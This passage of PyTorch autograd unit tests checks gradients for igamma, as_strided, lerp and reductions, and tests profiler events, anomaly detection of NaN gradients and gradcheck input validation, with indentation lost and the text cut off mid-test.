s = (torch.rand(100, dtype=torch.double) + 1e-3)
x = (torch.rand(100, dtype=torch.double) + 1e-3).requires_grad_()
gradcheck(torch.igamma, (s, x))
gradgradcheck(torch.igamma, (s, x))
def test_igammac(self):
# 1e-3 offset to avoid zeros in s
# NOTE: derivative for s is not implemented
s = (torch.rand(100, dtype=torch.double) + 1e-3)
x = (torch.rand(100, dtype=torch.double)).requires_grad_()
gradcheck(torch.igamma, (s, x))
gradgradcheck(torch.igamma, (s, x))
def test_profiler(self):
x = torch.randn(10, 10)
with profile(use_kineto=kineto_available()) as p:
self.assertTrue(torch.autograd._profiler_enabled())
y = x * 2 + 4
self.assertFalse(torch.autograd._profiler_enabled())
names = ['aten::mul', 'aten::add']
found_indices = set()
for evt in p.function_events:
if evt.name in names:
found_indices.add(names.index(evt.name))
self.assertEquals(len(found_indices), len(names))
def test_profiler_seq_nr(self):
with profile(use_kineto=kineto_available()) as p:
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=True)
z = x + y
s = z.sum()
s.backward()
print(p.key_averages().table(
sort_by="self_cpu_time_total", row_limit=-1))
# expecting aten::add, aten::sum to have the sequence numbers,
# expecting the corresponding backward nodes to have the same numbers
# as the forward ops
add_seq_nr = -1
sum_seq_nr = -1
found_add = found_sum = False
found_bwd_add = found_bwd_sum = False
found_empty = False
for e in p.function_events:
if e.name == "aten::add":
add_seq_nr = e.sequence_nr
self.assertFalse(found_add)
found_add = True
elif e.name == "aten::sum":
sum_seq_nr = e.sequence_nr
self.assertFalse(found_sum)
found_sum = True
elif "Add" in e.name and "Backward" in e.name:
self.assertEqual(e.sequence_nr, add_seq_nr)
self.assertFalse(found_bwd_add)
found_bwd_add = True
elif "Sum" in e.name and "Backward" in e.name:
self.assertEqual(e.sequence_nr, sum_seq_nr)
self.assertFalse(found_bwd_sum)
found_bwd_sum = True
# check that nested ops (e.g. empty) don't have
# sequence number
if e.name == "aten::empty":
self.assertEqual(e.sequence_nr, -1)
found_empty = True
self.assertGreaterEqual(add_seq_nr, 0)
self.assertGreaterEqual(sum_seq_nr, 0)
self.assertNotEqual(add_seq_nr, sum_seq_nr)
self.assertTrue(found_add)
self.assertTrue(found_sum)
self.assertTrue(found_bwd_add)
self.assertTrue(found_bwd_sum)
self.assertTrue(found_empty)
def test_profiler_unboxed_only(self):
x = torch.rand(3, 4)
with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
x.resize_([3, 2])
def test_profiler_propagation(self):
def foo(x):
with record_function("in_foo") as rf:
return x * 2
x = torch.rand(3, 4)
traced_foo = torch.jit.trace(foo, x)
def bar(x):
with record_function("in_bar") as rf:
# we expect that profiler will be able
# propagate across fork
fut = torch.jit._fork(traced_foo, x)
y = torch.jit._wait(fut)
# note: continuation (and rf's end) can
# be executed in a different thread
with record_function("in_bar_after_wait") as rf2:
y = y * 2
return y
traced_bar = torch.jit.trace(bar, x)
with profile(use_kineto=kineto_available()) as p:
traced_bar(x)
found_foo = False
found_bar = False
found_bar_after_wait = False
for info in p.function_events:
if info.name == "in_foo":
self.assertFalse(found_foo)
found_foo = True
elif info.name == "in_bar":
self.assertFalse(found_bar)
found_bar = True
elif info.name == "in_bar_after_wait":
self.assertFalse(found_bar_after_wait)
found_bar_after_wait = True
self.assertTrue(found_foo)
self.assertTrue(found_bar)
self.assertTrue(found_bar_after_wait)
def test_record_function_callbacks(self):
x = torch.randn(10, 10)
with profile(use_kineto=kineto_available()) as p:
with record_function("foo"):
y = x * 2 + 4
function_events = p.function_events
foo_event = [event for event in function_events if "foo" in event.name][0]
self.assertEqual(foo_event.count, 1)
def test_profiler_aggregation_fake(self):
events = EventList()
id = [0]
def get_id():
id[0] = id[0] + 1
return id[0]
# [[thread_id, [(start, end, id), ....]], ...]
# Using list instead of a dict so order is guaranteed for any Python
# version
threads = [
[1, [(0, 1, get_id()), (1, 2, get_id())]],
[0, [(0, 2, get_id()), (1, 2, get_id()), (1, 3, get_id())]],
]
for thread, ranges in threads:
for range in ranges:
assert(len(range) == 3)
events.append(
FunctionEvent(
id=range[2],
node_id=0,
name="",
thread=thread,
start_us=range[0],
end_us=range[1],
)
)
events._populate_cpu_children()
# Note that [1, 3] pushes out [0, 2] first. Then we record [1, 2]
# as a child of [1, 3]
res = [[], [], [], [], [4]]
def get_children_ids(event):
return [child.id for child in event.cpu_children]
assert([get_children_ids(event) for event in events] == res)
def test_profiler_aggregation_table(self):
"""
Test if the profiling result is aggregated for `str(prof)`
See: https://github.com/pytorch/pytorch/issues/37500
"""
x = torch.randn(1024)
with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
torch.einsum("i->", x)
prof_str = str(prof)
prof_table = prof.table()
self.assertEqual(prof_table, prof_str)
def test_profiler_function_event_avg(self):
avg = FunctionEventAvg()
avg.add(FunctionEvent(id=0, node_id=0, name="foo", thread=0, start_us=10, end_us=15))
avg.add(FunctionEvent(id=1, node_id=0, name="foo", thread=0, start_us=20, end_us=30))
avg.add(avg)
self.assertEqual(avg.key, "foo")
# aggregate stats
self.assertEqual(avg.count, 4)
self.assertEqual(avg.cpu_time_total, 30)
self.assertEqual(avg.self_cpu_time_total, 30)
self.assertEqual(avg.cuda_time_total, 0)
# average stats
self.assertEqual(avg.cpu_time, 7.5)
self.assertEqual(avg.cuda_time_total, 0)
def test_profiler_shapes(self):
print("")
layer1 = torch.nn.Linear(20, 30)
layer2 = torch.nn.Linear(30, 40)
input = torch.randn(128, 20)
with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
layer2(layer1(input))
print(prof.function_events)
linear_expected_shapes = [
[[128, 20], [30, 20], [30]],
[[128, 30], [40, 30], [40]],
]
found_indices = set()
for event in prof.function_events:
if event.name == "aten::linear":
self.assertTrue(event.input_shapes in linear_expected_shapes)
found_indices.add(linear_expected_shapes.index(event.input_shapes))
self.assertEqual(len(found_indices), len(linear_expected_shapes))
def test_profiler_aggregation_lstm(self):
print("")
rnn = torch.nn.LSTM(10, 20, 2)
total_time_s = 0
with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
for i in range(20):
input = torch.randn(5, 3, 10)
h = torch.randn(2, 3, 20)
c = torch.randn(2, 3, 20)
start = time.time()
rnn(input, (h, c))
end = time.time()
total_time_s += end - start
print(prof.table(
sort_by="self_cpu_time_total", row_limit=10, header="TEST"))
print(prof.key_averages(group_by_input_shape=True).table(
sort_by="self_cpu_time_total", row_limit=10))
print(prof.table(
sort_by="self_cpu_time_total", row_limit=10, max_src_column_width=300, header="TEST", top_level_events_only=True))
print(prof.key_averages(group_by_input_shape=True).table(
sort_by="self_cpu_time_total", row_limit=10, top_level_events_only=True))
total_time_us = total_time_s * 1000.0 * 1000.0 # make it us which is profiler default
print(
"Total time based on python measurements: ",
format_time(total_time_us)
)
print(
"CPU time measurement python side overhead: {:.2f}%".format(
(total_time_us / prof.self_cpu_time_total - 1.0) * 100.0
)
)
if sys.platform != "win32":
with tempfile.NamedTemporaryFile() as trace_file:
prof.export_chrome_trace(trace_file.name)
def test_record_function(self):
x = torch.randn(10, 10)
def forward(x):
with record_function("outer"):
y = x * 2 + 4
with record_function("inner"):
y = y - 1
y = y / 1
forward(x)
with profile(use_kineto=kineto_available()) as p:
forward(x)
events = p.function_events
important_events = [
'outer',
'aten::mul',
'aten::add',
'inner',
'aten::sub',
'aten::div'
]
idx = 0
for info in events:
if info.name == important_events[idx]:
idx = idx + 1
if idx == len(important_events):
break
self.assertEqual(idx, len(important_events))
# We can also use record_function to decorate arbitrary function
@record_function('my_func')
def f(x, y):
return x + y
with profile(use_kineto=kineto_available()) as p:
f(1, 2)
self.assertTrue('my_func' in str(p))
def test_record_function_multithreaded(self):
rf = record_function("outer")
rf.__enter__()
with record_function("inner"):
# test that exiting the record function after starting another one
# doesn't throw.
rf.__exit__(None, None, None)
with record_function("inner"):
rf.__enter__()
# test that exiting the record function after ending another one
# doesn't throw.
rf.__exit__(None, None, None)
def test_dir(self):
x = torch.randn(10, 10)
keys = dir(x)
self.assertIn('shape', keys)
# real and imag are only implemented for complex tensors.
y = torch.randn(10, 10, dtype=torch.cfloat)
for key in ['real', 'imag']:
self.assertRaises(RuntimeError, lambda: hasattr(x, key))
self.assertTrue(hasattr(y, key))
keys.remove(key)
for key in keys:
self.assertTrue(hasattr(x, key))
def test_as_strided(self):
def test(x, prepro_fn, size, strides, offset=None):
x = x.to(torch.double).detach().requires_grad_()
# Check that forward will **not** resize storage because it may
# cause NaN in output and fail numerical Jacobian check consequently
with torch.no_grad():
y = prepro_fn(x) if prepro_fn is not None else x
max_offset = sum((si - 1) * st for si, st in zip(size, strides))
max_offset += offset if offset is not None else y.storage_offset()
assert max_offset < len(y.storage()), "test case resizes storage"
def closure(x):
if prepro_fn is not None:
x = prepro_fn(x)
return x.as_strided(size, strides, offset)
gradcheck(closure, [x])
gradgradcheck(closure, [x])
# test
test(torch.arange(0, 25), lambda x: x.view(5, 5), [3, 3], [6, 2], 2)
# test crazy stride at dim with size 1 case
test(torch.randn(12), None, [1, 2, 1, 5], [0, 5, 100, 1], 2)
# test expand case
test(torch.randn(5), None, [3, 3, 3], [0, 1, 0], 2)
test(torch.randn(5), None, [3, 3, 3], [0, 0, 0], 4)
test(torch.randn(5), lambda x: x.expand(5, 5), [5, 5], [0, 1], 0)
# test non-expand overlapping case
test(torch.randn(35), None, [6, 6], [5, 1], 2)
test(torch.randn(15), None, [3, 2], [3, 6], 2)
# test transpose case
test(torch.randn(3, 4), None, [4, 3], [1, 4])
# test "getting things outside the input" case
x = torch.randn(6, 2)
test(x[3:], None, [3, 2], [2, 1], 0) # should be all zeros
self.assertEqual(x[3:].as_strided([3, 2], [2, 1], 0), x[:3])
# test select on expanded input case
test(torch.randn(2, 3), lambda x: x.expand(10, 2, 3), [2, 3], [3, 1], 0)
# TODO: see if these tests can be ported to OpInfos or moved to
# test_tensor_creation_ops.py
def _test_lerp_tensor_weights(self, cast):
def construct_inputs(*shapes):
start = cast(torch.randn(shapes[0], dtype=torch.double)).requires_grad_()
end = cast(torch.randn(shapes[1], dtype=torch.double)).requires_grad_()
weight = cast(torch.randn(shapes[2], dtype=torch.double)).requires_grad_()
return [start, end, weight]
all_test_shapes = [((3, 3, 3), (3, 3, 3), (3, 3, 3)), # no broadcasting
((3,), (3, 3, 3), (3, 3, 3)), # start broadcasting - 1
((3, 3, 3), (3,), (3, 3, 3)), # end broadcasting - 1
((3, 3, 3), (3, 3, 3), (3,)), # weight broadcasting - 1
((), (3, 3, 3), (3, 3, 3)), # start broadcasting - 2
((3, 3, 3), (), (3, 3, 3)), # end broadcasting - 2
((3, 3, 3), (3, 3, 3), ()), # weight broadcasting - 2
((3, 3), (3, 3, 3), (3,))] # all broadcasting
for shapes in all_test_shapes:
cur_inputs = construct_inputs(*shapes)
gradcheck(torch.lerp, cur_inputs)
gradgradcheck(torch.lerp, cur_inputs)
def test_lerp_tensor_weights(self):
self._test_lerp_tensor_weights(lambda t: t)
# TODO: see if these tests can be moved to OpInfos or test_reductions.py
def test_reduce_dtype(self):
def test_reduction(op, has_no_dim, takes_dtype=True):
x = torch.randn(3, 3, dtype=torch.float, requires_grad=True)
if has_no_dim:
grad1, = torch.autograd.grad([op(x)], [x])
grad2, = torch.autograd.grad([op(x, dtype=torch.double)], [x])
self.assertEqual(grad1, grad2)
self.assertEqual(grad2.dtype, torch.float)
gi = torch.randn(op(x, dim=0).shape, dtype=torch.float)
grad1, = torch.autograd.grad([op(x, dim=0)], [x], gi)
if takes_dtype:
grad2, = torch.autograd.grad([op(x, dim=0, dtype=torch.double)], [x], gi.double())
else:
grad2, = torch.autograd.grad([op(x.double(), dim=0)], [x], gi.double())
self.assertEqual(grad1, grad2)
self.assertEqual(grad2.dtype, torch.float)
test_reduction(torch.sum, True)
test_reduction(torch.prod, True)
test_reduction(torch.cumsum, False)
test_reduction(torch.cumprod, False)
test_reduction(torch.logcumsumexp, False, takes_dtype=False)
def test_inplace_on_view_saved_output(self):
# Test an in-place operation on a view in which the in-place op saves
# its output. Previously, this created a reference cycle.
dealloc = [0]
class IncrementOnDelete(object):
def __del__(self):
dealloc[0] += 1
def test():
root = torch.randn(3, 3, requires_grad=True)
copy = root.clone()
copy.grad_fn.register_hook(IncrementOnDelete())
view = copy.view(9)
torch.nn.functional.relu(view, inplace=True)
test()
self.assertEqual(dealloc[0], 1)
def test_inplace_on_view_leaf_errors(self):
# Issue #21875: Fail faster (when we try to modify the view vs. in backward())
x = torch.zeros(1, requires_grad=True)
y = x.view_as(x)
with self.assertRaisesRegex(RuntimeError,
"a view of a leaf Variable that "
"requires grad is being used in "
"an in-place operation."):
y.add_(1)
def test_inplace_on_view_backward(self):
# Issue #10532: Make sure that this does not raise RuntimeError.
net = nn.Sequential(
nn.InstanceNorm2d(2),
nn.ReLU(True)
)
x = torch.tensor([[[[1.0, 1.0]]]], requires_grad=True)
g, = torch.autograd.grad(net(x).pow(2), [x], grad_outputs=x.new_ones(x.shape) , create_graph=True)
torch.autograd.grad(g.sum(), [x])
self.assertEqual(x, torch.tensor([[[[1.0, 1.0]]]]))
# https://discuss.pytorch.org/t/freeing-buffer-strange-behavior/31955/8
inputs = torch.ones((1, 3, 256, 256), requires_grad=True)
tmp1 = (inputs + 1).view_as(inputs)
tmp2 = torch.nn.functional.threshold(tmp1, 0., 0., True)
prob_interpolated = torch.sigmoid(tmp2)
gradients = torch.autograd.grad(outputs=prob_interpolated, inputs=inputs,
grad_outputs=torch.ones(prob_interpolated.size()),
create_graph=True, retain_graph=True)[0]
gradient_penalty = gradients.sum()
gradient_penalty.backward()
fn = gradient_penalty.grad_fn.next_functions[0][0].next_functions[1][0]
self.assertEqual(fn.name(), "ThresholdBackwardBackward")
def test_inplace_on_view_weak_grad_fn(self):
# Issue 23502: Test that b's grad_fn is preserved.
a = torch.arange(10.0, requires_grad=True)
b = a.narrow(0, 0, 2).clone().view(-1)
b.relu_()
c = b.clone()
del b
gc.collect()
s = c.sum()
s.backward()
self.assertEqual(s, torch.tensor(1.0))
# Issue #21875: Fail faster (when we try to modify the view vs. in backward())
a = torch.rand(10, requires_grad=True).narrow(0, 0, 10)
with self.assertRaises(RuntimeError):
b = a.relu_()
# TODO: see if these tests can be moved to OpInfo or test_binary_ufuncs.py
def test_mul_out(self):
a = torch.randn(2, 2, requires_grad=True)
b = torch.randn(2, 2, requires_grad=True)
x = torch.zeros_like(a)
# out=... functions don't support automatic differentiation currently
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
# the inputs can require grad if we're in no_grad() mode
with torch.no_grad():
torch.mul(a, b, out=x)
self.assertEqual(x, a * b)
def test_mul_out_result_requires_grad(self):
a = torch.randn(2, 2)
b = torch.randn(2, 2)
x = torch.zeros(2, 2, requires_grad=True)
# we should throw an exception if the output requires grad
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
# TODO: see if this test can be OpInfo'd or moved to diagonal's test suite
def test_diagonal_derivative_requires_grad(self):
# test that the backward requires grad
# we do this is because diagonal_backward uses inplace
# operations and gradgradcheck does not catch whether
# they works as expected (it will succeed even if
# the gradient has requires_grad == False
a = torch.randn(5, 6, requires_grad=True)
b = torch.diagonal(a)**2
c = b.sum()
d, = torch.autograd.grad(c, a, retain_graph=True, create_graph=True)
self.assertTrue(d.requires_grad)
def test_anomaly_detect_nan(self):
size = 10
class MyFunc(Function):
@staticmethod
def forward(ctx, inp1, inp2, fail_0th):
ctx.fail_0th = fail_0th
return inp1.sum(0, keepdim=True)
@staticmethod
def backward(ctx, gO):
gI = gO.clone().expand(size)
gI[0] = 0
gI[0] /= 0 # Generate a nan
if ctx.fail_0th:
return gI, None, None
else:
return None, gI, None
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, inp, True)
out.backward() # Should not fail
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, inp, True)
with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 0th output."):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
out.backward()
self.assertIn('No forward pass information', str(w[0].message))
inp = torch.rand(size, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 1th output."):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
out = MyFunc.apply(inp, inp, False)
out.backward()
self.assertIn('MyFunc.apply', str(w[0].message))
def test_nested_anomaly_detect_nan(self):
size = 10
class MyFunc(Function):
@staticmethod
def forward(ctx, inp1, fail_0th):
ctx.fail_0th = fail_0th
ctx.save_for_backward(inp1)
return inp1.sum(0, keepdim=True)
@staticmethod
def backward(ctx, gO):
inp, = ctx.saved_tensors
fail_0th = ctx.fail_0th
g = gO.clone().expand(size)
gI = MyFunc2.apply(g * inp, g + inp, fail_0th)
return gI, None
class MyFunc2(Function):
@staticmethod
def forward(ctx, inp1, inp2, fail_0th):
ctx.fail_0th = fail_0th
return inp1 * 2.0 + inp2
@staticmethod
def backward(ctx, gO):
fail_0th = ctx.fail_0th
g1 = gO.clone()
g2 = gO.clone()
g1[0] = 0
g2[0] = 0
# generate a nan
if fail_0th:
g1[0] /= 0
else:
g2[0] /= 0
return g1, g2, None
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, True)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
gsum.backward() # should not fail
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, True)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
with detect_anomaly():
gsum.backward()
self.assertIn('No forward pass information', str(w[1].message))
inp = torch.rand(size, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 1th output."):
with detect_anomaly():
out = MyFunc.apply(inp, False)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
gsum.backward()
self.assertIn('MyFunc2.apply', str(w[1].message))
self.assertIn('MyFunc.apply', str(w[2].message))
def test_anomaly_grad_warnings(self):
# PyTorch won't throw warnings if there is an error
# but we'd want to at least see them in stderr
class StdErrDiverter:
def __enter__(self):
self.stderr_orig = sys.stderr
self.stderr_new = io.StringIO()
sys.stderr = self.stderr_new
return self
def __exit__(self, *args):
self.captured = self.stderr_new.getvalue()
sys.stderr = self.stderr_orig
# if the warnings don't throw, they will be handled as regular warnings
with self.assertRaisesRegex(RuntimeError,
"one of the variables needed for gradient computation has been "
"modified by an inplace operation"):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
a = torch.randn(5, requires_grad=True)
d1 = a + 1
d2 = d1 ** 2
d1 += 1
torch.autograd.grad(d2.sum(), a)
self.assertEqual(len(w), 2)
self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
self.assertIn('Error detected in PowBackward0', str(w[1].message))
# if the warning throws, it will be printed to sys.stderr
with self.assertRaisesRegex(RuntimeError,
"one of the variables needed for gradient computation has been "
"modified by an inplace operation"):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
warnings.simplefilter("error")
with StdErrDiverter() as s:
a = torch.randn(5, requires_grad=True)
d1 = a + 1
d2 = d1 ** 2
d1 += 1
torch.autograd.grad(d2.sum(), a)
self.assertEqual(len(w), 1)
self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
self.assertIn('Error detected in PowBackward0', s.captured)
def test_anomaly_assign_parent_cleanup(self):
# Test that python objects created are properly cleaned up when assign_parent is called
import weakref
def get_ref():
# we use torch.exp here but any function that will construct a new node in its
# backward call in grad mode will work
x = torch.randn(2, 2, requires_grad=True)
t = x.exp()
# ExpBackward calls mul, creating the MulBackward node when create_graph=True.
# In anomaly mode, a PyObject referencing MulBackward's "parent" ExpBackward is added to
# MulBackward's anomaly metadata dict, creating the following reference chain:
#
# grad -> MulBackward -> PyObject -> ExpBackward
#
with detect_anomaly():
grad = torch.autograd.grad(t, x, torch.ones_like(t), create_graph=True)
# We add a weak reference to a new Foo object, which we insert into ExpBackward's metadata dict
#
# (PyObject) -> ExpBackward -> dict -> *Foo*
# t ----^ WeakRef ---^
#
# We want to test that when grad goes out of scope at the end of this function that PyObject is destroyed
# We can test this by seeing whether Foo is not kept alive once t is destroyed
class Foo(object):
pass
my_obj = Foo()
meta_dict = t.grad_fn.metadata
meta_dict[0] = my_obj
ref = weakref.ref(my_obj)
return t, ref
t, ref = get_ref()
self.assertIsNotNone(ref())
del t
self.assertIsNone(ref())
def test_nested_anomaly_printstack_cleanup(self):
# Test if metadata dict PyObject is properly destroyed
import weakref
def get_ref():
# This is similar to the construction in test_anomaly_assign_parent_cleanup:
#
# MyFuncBackward2 -> PyObject -> MyFuncBackward -> dict -> Foo
# out ---^ WeakRef ---^
#
# We want to check that Foo is still properly destroyed even when MyFunc2Backward's
# AnomalyMetadata calls printstack, which does some python object manipulation.
#
# You might be wondering why we still have to test_anomaly_assign_parent_cleanup,
# since if PyObject is not destroyed here, wouldn't this test would detect that also?
# The answer is that custom function's PyObject (THPFunction) actually only hold
# a weak reference to the c++ node!
class MyFunc(Function):
@staticmethod
def forward(ctx, x):
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, gO):
x, = ctx.saved_tensors
return MyFunc2.apply(x)
class MyFunc2(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, gO):
return gO + float("NaN")
inp = torch.rand(1, requires_grad=True)
out = MyFunc.apply(inp)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
with detect_anomaly():
ginp.backward()
class Foo(object):
pass
my_obj = Foo()
meta_dict = out.grad_fn.metadata
meta_dict[0] = my_obj
ref = weakref.ref(my_obj)
return out, ref
t, ref = get_ref()
self.assertIsNotNone(ref())
del t
self.assertIsNone(ref())
# TODO: update these tests to use the linalg module and move to test_linalg.py
@skipIfNoLapack
def test_eig_no_eigenvectors(self):
A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
w, v = torch.eig(A, eigenvectors=False)
with self.assertRaisesRegex(RuntimeError, 'is not differentiable'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_eig_complex_eigenvalues(self):
A = torch.tensor([[0., -1.], [1., 0.]], dtype=torch.float32, requires_grad=True)
w, v = torch.eig(A, eigenvectors=True)
with self.assertRaisesRegex(RuntimeError, 'does not support complex eigenvalues'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_symeig_no_eigenvectors(self):
A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
w, v = torch.symeig(A, eigenvectors=False)
with self.assertRaisesRegex(RuntimeError, 'is not differentiable'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_svd_no_singularvectors(self):
A = torch.randn(2, 2, dtype=torch.float32, requires_grad=True)
u, s, v = torch.svd(A, compute_uv=False)
with self.assertRaisesRegex(RuntimeError, 'cannot compute backward'):
torch.autograd.backward([u, s, v], [torch.ones_like(u), torch.ones_like(s), torch.ones_like(v)])
def test_no_grad_copy(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad.data_ptr()
return grad, grad
class NonContGradFunc(Function):
@staticmethod
def forward(ctx, inp1):
ctx.size = inp1.size()
return torch.tensor([1.])
@staticmethod
def backward(ctx, grad):
return torch.ones(1).expand(ctx.size)
a = torch.randn(5, 6, requires_grad=True)
b = torch.randn(5, 6, requires_grad=True)
# non-contiguous grad should be copied
NonContGradFunc.apply(MyFunc.apply(a, b)).backward()
self.assertFalse(a.grad.data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(b.grad.data_ptr() == MyFunc.static_grad_ptr)
# test case that should trigger no copy for one of a,b
a.grad = b.grad = None
MyFunc.apply(a, b)[1][0].backward()
p_g = MyFunc.static_grad_ptr
p_a = a.grad.data_ptr()
p_b = b.grad.data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# check one of them is using the computed buffer
self.assertTrue(p_a == p_g or p_b == p_g)
def test_no_grad_copy_sparse(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
return grad, grad
class NonContGradFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
# Create a sparse tensor with non-contigous indices and values
# and return as grad.
v = torch.rand(1, 3)
i = torch.ones(1, 1, dtype=torch.long)
nv = v.expand(8, 3)
ni = i.expand(1, 8)
ngrad = torch.sparse.FloatTensor(ni, nv, torch.Size([10, 3]))
NonContGradFunc.static_grad_ptr = ngrad._values().data_ptr()
return ngrad, ngrad
a = torch.randn(10, 3, requires_grad=True)
b = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
# test case that should trigger no copy for one of a,b
emb_matrix = MyFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
loss.backward(retain_graph=True)
p_g = MyFunc.static_grad_ptr
p_a = a.grad._values().data_ptr()
p_b = b.grad._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# check one of them is using the computed buffer
self.assertTrue(p_a == p_g or p_b == p_g)
# Run backwards multiple times to ensure accumulation works.
for i in range(10):
loss.backward(retain_graph=True)
# non-contiguous indices and value, we should trigger a copy.
a.grad = b.grad = None
emb_matrix = NonContGradFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
loss.backward(retain_graph=True)
p_g = NonContGradFunc.static_grad_ptr
p_a = a.grad._values().data_ptr()
p_b = b.grad._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# Verify we cloned both grads.
self.assertFalse(p_a == p_g)
self.assertFalse(p_b == p_g)
# Run backwards multiple times to ensure accumulation works.
for i in range(10):
loss.backward(retain_graph=True)
def test_gradcheck_single_input(self):
def check(fast_mode):
def f(inp):
return inp.mul(5)
gradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
gradgradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_sparse_input(self):
def check(fast_mode):
def fn(sparse):
return torch.sparse.sum(sparse)
gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=True,
check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'gradcheck expects all tensor inputs are dense'):
gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=False,
check_batched_grad=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_nondeterministic(self):
class NonDetFunc(Function):
@staticmethod
def forward(ctx, x, jitter=0.0):
ctx._jitter = jitter
return x
@staticmethod
def backward(ctx, grad_out):
return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None
def check(fast_mode):
inp = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, check_batched_grad=False, fast_mode=fast_mode)
gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_validates_inputs(self):
def check(fast_mode):
# when inputs are not dense, but check_sparse_nnz is false
x = torch.rand(10, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'dense when check_sparse_nnz is set to False.'):
gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False, check_batched_grad=False,
fast_mode=fast_mode)
self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False,
check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
# when none of the inputs require grad (always raises even if raise_exception=False)
x = torch.rand(10, requires_grad=False)
with self.assertRaisesRegex(ValueError, 'at least one input tensor to require gradient'):
gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
# (warning) when inputs are not double precision
x = torch.ones(1, dtype=torch.float32, requires_grad=True)
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
